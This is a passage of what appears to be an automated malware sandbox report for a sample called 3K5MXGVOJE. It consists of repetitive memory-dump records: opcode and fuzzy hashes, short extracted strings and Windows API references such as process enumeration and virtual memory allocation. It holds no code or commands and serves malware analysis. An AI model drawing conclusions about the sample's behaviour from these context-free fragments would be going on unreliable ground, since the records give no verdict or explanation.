                                        • Opcode ID: b63657978053fa35a9f0b96af4c499c4044ef8f9286efe452c9155df9931539e
                                        • Instruction ID: 4eada2ad4764fc1931cf8e357dbf6a427df7756027aaee9d8134555797f76dbf
                                        • Opcode Fuzzy Hash: b63657978053fa35a9f0b96af4c499c4044ef8f9286efe452c9155df9931539e
                                        • Instruction Fuzzy Hash: DE2166728002499FDF11DFAAC840AEEBBF5BF48314F15881AE918A3210C7399910CFA0
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 051847D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: 65b10d067d50d65eb53c1adf93c1d81b25f4946491b68a858d932d126d8ce4bb
                                        • Instruction ID: 2fb68418630e207152820cf00c30b61e4428766c525499688cdeac48a98424b1
                                        • Opcode Fuzzy Hash: 65b10d067d50d65eb53c1adf93c1d81b25f4946491b68a858d932d126d8ce4bb
                                        • Instruction Fuzzy Hash: C52134B19003499FDB10DFAAD880ADEFBF4BF48310F50881AE518A7200C774A914CFA4
                                        APIs
                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 05184E7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileInformationQueryVolume
                                        • String ID:
                                        • API String ID: 634242254-0
                                        • Opcode ID: 8f7e9c4e75795976395868933ef31027cf6146f7b303e52ee83b14cff756b00c
                                        • Instruction ID: 7d0887ea72d897c034311e641fc8eabedc059f319a21a826d43e4796ad4e7978
                                        • Opcode Fuzzy Hash: 8f7e9c4e75795976395868933ef31027cf6146f7b303e52ee83b14cff756b00c
                                        • Instruction Fuzzy Hash: 442134B19003499FDB10DFAAD884BEEFBF4AB48310F54881AD419A7250C778A945CFA4
                                        APIs
                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 05184E7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FileInformationQueryVolume
                                        • String ID:
                                        • API String ID: 634242254-0
                                        • Opcode ID: e444669f18ecd484891289d290ba412b5c3b55ab60d33f7996b31961f9b538f8
                                        • Instruction ID: b5c358247defc95db083370f413300ad273334ca391a9e17e968ea52e027a060
                                        • Opcode Fuzzy Hash: e444669f18ecd484891289d290ba412b5c3b55ab60d33f7996b31961f9b538f8
                                        • Instruction Fuzzy Hash: 692124B1D003499FDB10DFAAD884BEEFBF4AF48310F54882AD419A7250C778A944CFA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'#r
                                        • API String ID: 0-1731184390
                                        • Opcode ID: 4e75daaa73d015a064495e4791db14bcd0253462cfb6c2f51dda64da9109ada2
                                        • Instruction ID: b804bb85ed22ddc724640128f7df6ff05aacb64c38def7c17df2ca949bb70ee5
                                        • Opcode Fuzzy Hash: 4e75daaa73d015a064495e4791db14bcd0253462cfb6c2f51dda64da9109ada2
                                        • Instruction Fuzzy Hash: 4CB10836F012248FDB58DFADC89869DB7F2AB88300F5581AAD809EB341DB749D45CBD0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 4f764858570c1a45fd6abbfe97f885b62aa368bc02bba011617738333c00b6be
                                        • Instruction ID: 1e14be6f38dbc8cdcc01a98e2debc20d19af03e84de82dbf935665e04a79e67f
                                        • Opcode Fuzzy Hash: 4f764858570c1a45fd6abbfe97f885b62aa368bc02bba011617738333c00b6be
                                        • Instruction Fuzzy Hash: BD112B71D003498FDB14DFAAD8457AEFBF5EF88214F15881AC419A7240C778A945CFA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 1a9780a06c1880ad0bd9dd4e5dd7c318a13d2f08aa39b21ca3bfc15d8389507e
                                        • Instruction ID: 5d1f58ac59f5b3ec194444c3f400851e3d0710557576dbf717f0a8897bd3b058
                                        • Opcode Fuzzy Hash: 1a9780a06c1880ad0bd9dd4e5dd7c318a13d2f08aa39b21ca3bfc15d8389507e
                                        • Instruction Fuzzy Hash: 3A113A71D003498FDB20DFAAD8447AEFBF5AB88214F14881AC419A7240C778A944CFA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #dym^
                                        • API String ID: 0-2050938880
                                        • Opcode ID: 2dc753f892a918e1a0da75449a16fe3c2dc03ef5349723c3ac751cd682dccd73
                                        • Instruction ID: ead89b37e3ddd9b018b4d0cd7d0bc7a37e1bdd39a064a1562d42cc97c6dc061d
                                        • Opcode Fuzzy Hash: 2dc753f892a918e1a0da75449a16fe3c2dc03ef5349723c3ac751cd682dccd73
                                        • Instruction Fuzzy Hash: 9D91D575F102559BDB05DF6DE8A166EB7E2BFC4214B49853BE808EB304EB34DD058B81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #dym^
                                        • API String ID: 0-2050938880
                                        • Opcode ID: eaa75b4517f4fea32c2dcb9676aa7f712c97a60c7ca8eb5a1c234e02ce5ef9e9
                                        • Instruction ID: 05f097bf093e9f415920fe05bc6abbb68d49326690db4ad987e1e9372813dcec
                                        • Opcode Fuzzy Hash: eaa75b4517f4fea32c2dcb9676aa7f712c97a60c7ca8eb5a1c234e02ce5ef9e9
                                        • Instruction Fuzzy Hash: 5A81B175F102168BEB41EF6DE89166EB7E2BFC4214B45853BD908EB304EB34DD058B81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: +\
                                        • Instruction Fuzzy Hash: 0BA18135B001148FC794DF58C594A69B7E2FB88314B5AC5A9E80AEB395CB32ED43CBC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa65d366a8521337f3afd9c0309018fac0c74c40a5de35881e8bf209e1effd46
                                        • Instruction ID: e7bed58970fba14f7e792badcea5050dc8d5dc7f9816181633e80bb684fb036e
                                        • Opcode Fuzzy Hash: fa65d366a8521337f3afd9c0309018fac0c74c40a5de35881e8bf209e1effd46
                                        • Instruction Fuzzy Hash: 8E91AF74B103058FDB28EF68E8D566DBBB7BF88200B548569E406AB381DF75AC468F41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6058d79261494767af01c051625444649339a999803457fac84c3b2b965c260
                                        • Instruction ID: 06d95e656e6f6307646e94c7632c8442631f46c92fd75d18361a0d03279176d3
                                        • Opcode Fuzzy Hash: c6058d79261494767af01c051625444649339a999803457fac84c3b2b965c260
                                        • Instruction Fuzzy Hash: 6791BF35B002148FD758DF6DD890A69B7E2FF88310B5AC56AE909DB395DB31EC46CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08c2e80c002ebe888ad63cb4a13bd107922fc0e2b854d569dfab7038726fed62
                                        • Instruction ID: 01e1b83e87a012cd44d7ef7cbbb30b2168e79ac11cefa2d68c9e439f4800c351
                                        • Opcode Fuzzy Hash: 08c2e80c002ebe888ad63cb4a13bd107922fc0e2b854d569dfab7038726fed62
                                        • Instruction Fuzzy Hash: 8B819476F005249FCB18DFA9D8849ADB7F2FF887507198169E819EB361DB34AD01DB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c684c4f149c23368550c9c3dfc4005d9f806aa8254c77425673359a211068636
                                        • Instruction ID: 0a2687ae6c0e5a2b445297993601d2c9c255744c5e7973580769dfadcec9c3e2
                                        • Opcode Fuzzy Hash: c684c4f149c23368550c9c3dfc4005d9f806aa8254c77425673359a211068636
                                        • Instruction Fuzzy Hash: CA711A367052504FC715EB6CDC94A26BBE7AFC522471AC4EAD80ADF392CB64DC06C7A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1010361a23aace7f98ce33405d41a0bdf8ca33b69efa47d9470331fe577ba449
                                        • Instruction ID: 167924dfb0f2c958101e1b953f99703ef114029d6fb2455aee038cc3e09328bc
                                        • Opcode Fuzzy Hash: 1010361a23aace7f98ce33405d41a0bdf8ca33b69efa47d9470331fe577ba449
                                        • Instruction Fuzzy Hash: C3611A32E012648FCB54DFA8C99456DB7F2AF84310B16856ADC0AEF385DA74DD06DBD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1dbd10012eb1730145e374bec23c425d184340e494cff453ab46aa7935b9331
                                        • Instruction ID: e31882e213d28b7abdad17f10d306e7ae5567085d212c934b9034fe436a8bc16
                                        • Opcode Fuzzy Hash: a1dbd10012eb1730145e374bec23c425d184340e494cff453ab46aa7935b9331
                                        • Instruction Fuzzy Hash: A5A14D75A002288FDB64DF58D984B99B7B2FF84310F1585EAD80DAB391DB319E85CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6413e7713e0da2c19325710309c95b8a24eac92d4c3fbb23e97f801fe8dfdddd
                                        • Instruction ID: ab5e9bfb30afb59c872bcae0a0177cf4891a5a8d6c22bd4357fa34cd412855da
                                        • Opcode Fuzzy Hash: 6413e7713e0da2c19325710309c95b8a24eac92d4c3fbb23e97f801fe8dfdddd
                                        • Instruction Fuzzy Hash: 9271C636B001249BD754DFA8D884A5AF7E6EBC831075AC56AD80AEB341DA35DC41CBD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2797df9b3d40c1f3e5a58a3311f54adbe85b089bbc2e4d864b51a9f15a1f197f
                                        • Instruction ID: 4cd26704017f46dbf54889ad4e8dc8dabc67c418d8c06dc0c39dfb28907f142f
                                        • Opcode Fuzzy Hash: 2797df9b3d40c1f3e5a58a3311f54adbe85b089bbc2e4d864b51a9f15a1f197f
                                        • Instruction Fuzzy Hash: 0161F537E102648FD754CFA8C98195AB7B2AF84350B1A856EDC0AEB354DB31ED06CBC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067720984.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5180000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d67b0ef5b4b8435c91ae1dc4bd51c2cee94db2ed0600a207c62b39918ce53e6
                                        • Instruction ID: 68f6b745924fb5480ceefc86608374f9f07f122ff998b1f87b0b31dc492f61fe
                                        • Opcode Fuzzy Hash: 2d67b0ef5b4b8435c91ae1dc4bd51c2cee94db2ed0600a207c62b39918ce53e6
                                        • Instruction Fuzzy Hash: E7616A75B503099FCB24DFA9C894AADB7F2BF88300B658229E505EB311DB74AD46CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28b85a592f4ebbdfe08ce608cc493ebeb85eebab15ac7094635aa5b9497c04c6
                                        • Instruction ID: 1182569b1bd2567ecabfb75f478c616976273862ba3338c1eb63a22200e85d38
                                        • Opcode Fuzzy Hash: 28b85a592f4ebbdfe08ce608cc493ebeb85eebab15ac7094635aa5b9497c04c6
                                        • Instruction Fuzzy Hash: 9B618D71B107088FDB18DEAEC8D069EB6F3AB88204B54817DE50AEB752EF749C05DB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 816c3744b97df26fbc555da5b2456e0948c43cee3c092aa35bc8c9e764b024ee
                                        • Instruction ID: 4b394329f7398b1e5acbdc597d3da96865bc5b4ceee17902dddd77d7a64be417
                                        • Opcode Fuzzy Hash: 816c3744b97df26fbc555da5b2456e0948c43cee3c092aa35bc8c9e764b024ee
                                        • Instruction Fuzzy Hash: E9614C75E101148FC788CFA8D980999F7F2FB88714B5AC569E809EB355DB31ED42CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd387174181eb9c3dd73b334b02f5bcf703406b49819df9200c1892dd79dfaaf
                                        • Instruction ID: da7db769b58aba925bf3b008a30bfda51f7c1c10500a6ec568de64f7fb0b2ebf
                                        • Opcode Fuzzy Hash: dd387174181eb9c3dd73b334b02f5bcf703406b49819df9200c1892dd79dfaaf
                                        • Instruction Fuzzy Hash: 5351C476E112159FCB44DFA8D8509AAFBF2FB88310B19856AE809E7351D735ED02CBD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ddb01bda2dc788830452ab6c763f63b9718a703d8b1bc483469503e9f918151
                                        • Instruction ID: 7e3711558f096fefd7ca5be9974213a101a998e727b0bcb08e97dd6296ea7f7d
                                        • Opcode Fuzzy Hash: 2ddb01bda2dc788830452ab6c763f63b9718a703d8b1bc483469503e9f918151
                                        • Instruction Fuzzy Hash: 8851F576F002249FD754DFA8D89099EF7F2BB88210705856EE81AE7351DB34AD06CBD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1071047789.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c70000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af9d0f1a70622283bfb99e142549ecfa0c3cf3085b6af853ca84d039b9f19a8a
                                        • Instruction ID: b9677cbfb4776363cc9058623f9b02580bc2faf53fdfddcc4bd5c218c5a9203e
                                        • Opcode Fuzzy Hash: af9d0f1a70622283bfb99e142549ecfa0c3cf3085b6af853ca84d039b9f19a8a
                                        • Instruction Fuzzy Hash: 8851D476F011289FDB54DFA8D89099EF7F2BB88350745862AE81AE7351DB30AD05CBD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90927b90c73e2b32ee24b4ecab2e0281694da50460fecc3e26ac4a605d73cf34
                                        • Instruction ID: 165bc37ca58e7a535c60d22b0ac43d92ab0c5bbc7d5dd6933c66177b91f95417
                                        • Opcode Fuzzy Hash: 90927b90c73e2b32ee24b4ecab2e0281694da50460fecc3e26ac4a605d73cf34
                                        • Instruction Fuzzy Hash: AE51A175B107048FDB18DEAEC9D069DB2E3AF88204B54817DE50ADB756EB749C05DB00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bcdc8256ad89207cb64cb7c795588b2f2315a73f16bf9037967ee01c046e189
                                        • Instruction ID: 314eb05486f85b35a18a28145ec22e461cd16b16fe1920761e75e680a2ac3e2f
                                        • Opcode Fuzzy Hash: 4bcdc8256ad89207cb64cb7c795588b2f2315a73f16bf9037967ee01c046e189
                                        • Instruction Fuzzy Hash: D0515E76E111299FCB44DFA8D9809ADF7F2FB88320B198169EC09E7341D731AD52CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LlIq$LlIq
                                        • API String ID: 0-3941684836
                                        • Opcode ID: 43ea998bbcadfefb7401ffb21088b340196bfc9fc6dc5ffcab23363160802803
                                        • Instruction ID: 5d504a3352728ece8c7574d718201905c4df9a251f63c879d59141a541f9726e
                                        • Opcode Fuzzy Hash: 43ea998bbcadfefb7401ffb21088b340196bfc9fc6dc5ffcab23363160802803
                                        • Instruction Fuzzy Hash: 3C11017AF0421AABA73A9D6D981057B73B6BFC5511B25442BC80687204DF719801C7AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tmIq$tmIq
                                        • API String ID: 0-2280623689
                                        • Opcode ID: b8becc84d51f01b938937e4def69833cb491a825fc4547404238fec8d742d22f
                                        • Instruction ID: 2752dd7bf9c16b5b9982c5a82a89c0c64e4a88a7750a165a232c041fed7deaeb
                                        • Opcode Fuzzy Hash: b8becc84d51f01b938937e4def69833cb491a825fc4547404238fec8d742d22f
                                        • Instruction Fuzzy Hash: B001F53A74D7816BD727576C98206226F736FC2910B7E05BBC085CB256CBB08C46C76A
                                        APIs
                                        • Process32First.KERNEL32(00000014,?), ref: 05DFE136
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID:
                                        • API String ID: 2623510744-0
                                        • Opcode ID: 289804012720d898401bbf84e8e9baede411278e260d39c09e3aa0ccdbf1e9eb
                                        • Instruction ID: c44fbb4a4e297d341964aec62ef9408b6d53a70e03f6f80bad46c0e7ecc2564b
                                        • Opcode Fuzzy Hash: 289804012720d898401bbf84e8e9baede411278e260d39c09e3aa0ccdbf1e9eb
                                        • Instruction Fuzzy Hash: D6411570D052289FEB60CF6AC884BDABBB9FF49304F9184DAD50CA7250DB705A89CF50
                                        APIs
                                        • Process32First.KERNEL32(00000014,?), ref: 05DFE136
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID:
                                        • API String ID: 2623510744-0
                                        • Opcode ID: 3a463ed775c03c1313a602eab41215b1a2caf277af685e6a4e9944b1fa320b26
                                        • Instruction ID: bc7155f0a7069a8bb06da012ba3a4bc09dab6b3932fe5680b89c7acb96c205bd
                                        • Opcode Fuzzy Hash: 3a463ed775c03c1313a602eab41215b1a2caf277af685e6a4e9944b1fa320b26
                                        • Instruction Fuzzy Hash: 2E41F670D052289FEB60CF6AC884BDABBB9EF49304F9184DAD50CA7250DB745E85CF90
                                        APIs
                                        • Process32First.KERNEL32(00000014,?), ref: 05DFE136
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID:
                                        • API String ID: 2623510744-0
                                        • Opcode ID: 00340cfd31e6065f72410a7631d371cc7b80182f16eafe46cde6d390885ff16a
                                        • Instruction ID: 3afa1bd6c42d47aa8d50fc8ad8bee0d5183f401dffcdd9f33359d37e8e411242
                                        • Opcode Fuzzy Hash: 00340cfd31e6065f72410a7631d371cc7b80182f16eafe46cde6d390885ff16a
                                        • Instruction Fuzzy Hash: E241F670D052289FEB60CF69C884BDABBB9EF49304F9184DAD50CA7250DB745E85CF50
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 05DFE012
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069995303.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5df0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID: CreateSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3332741929-0
                                        • Opcode ID: 0e9fab0361468b270fcf970a1201bfa5b14a84f6c956f43c46816839cccdcde9
                                        • Instruction ID: e3b2d9fe73b224a1debedccc23e29449f55c62e54738862b6bf6397a9c2b3540
                                        • Opcode Fuzzy Hash: 0e9fab0361468b270fcf970a1201bfa5b14a84f6c956f43c46816839cccdcde9
                                        • Instruction Fuzzy Hash: D31133B19003499FDB20DF9AD884B9EFBF8EB49310F20881AD518A7350C374A944CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 7c0
                                        • API String ID: 0-4063725905
                                        • Opcode ID: bfcbd827069d42f32c32041ca377b8ef720bad686b4ce3cc2717415ad9b13fcc
                                        • Instruction ID: 1cb678ad6bc52910dfe3883c7fee1275959b6eab5f3fc96c1e4681b7ae74455b
                                        • Opcode Fuzzy Hash: bfcbd827069d42f32c32041ca377b8ef720bad686b4ce3cc2717415ad9b13fcc
                                        • Instruction Fuzzy Hash: D421C33BF111249F9B04DFADE88899DF7E2BBC8310B56816AE815E7355CB70DD028B80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LlIq
                                        • API String ID: 0-3086139195
                                        • Opcode ID: 4c7150008da26d22c708d59149895ae7d4fdb5b5af4110c18e96262ea634e84e
                                        • Instruction ID: 0b359228c3f7dbc65f9b45337d940beaab58a7bd9a8d1ef308ed426976e383fd
                                        • Opcode Fuzzy Hash: 4c7150008da26d22c708d59149895ae7d4fdb5b5af4110c18e96262ea634e84e
                                        • Instruction Fuzzy Hash: 491184BB948345AFCB378F28E9005AA3B75FFC2221F1A406BD40697211D7308841CB2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6i-8
                                        • API String ID: 0-3140119231
                                        • Opcode ID: 491a6c7355147e3596a2c8726c0db46595f188a6d23ef63eec0f004f1c4c60c0
                                        • Instruction ID: d8203f518dc3a53f75526382059fbf71d0d2ca1d9005033f206da2618363d44b
                                        • Opcode Fuzzy Hash: 491a6c7355147e3596a2c8726c0db46595f188a6d23ef63eec0f004f1c4c60c0
                                        • Instruction Fuzzy Hash: C701B172B086258FC7149B38DC9495A7BB6FF9522531902AEE805EB7A1DB32DC41CBD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6i-8
                                        • API String ID: 0-3140119231
                                        • Opcode ID: 2170bc9cae5b4b68c3049cb1b6afff540201c4dbfbe8120745163f5f48762696
                                        • Instruction ID: f45780d7dc3b315c3c374caea0b38318d9a31a9455153b475fef3448693c9d7c
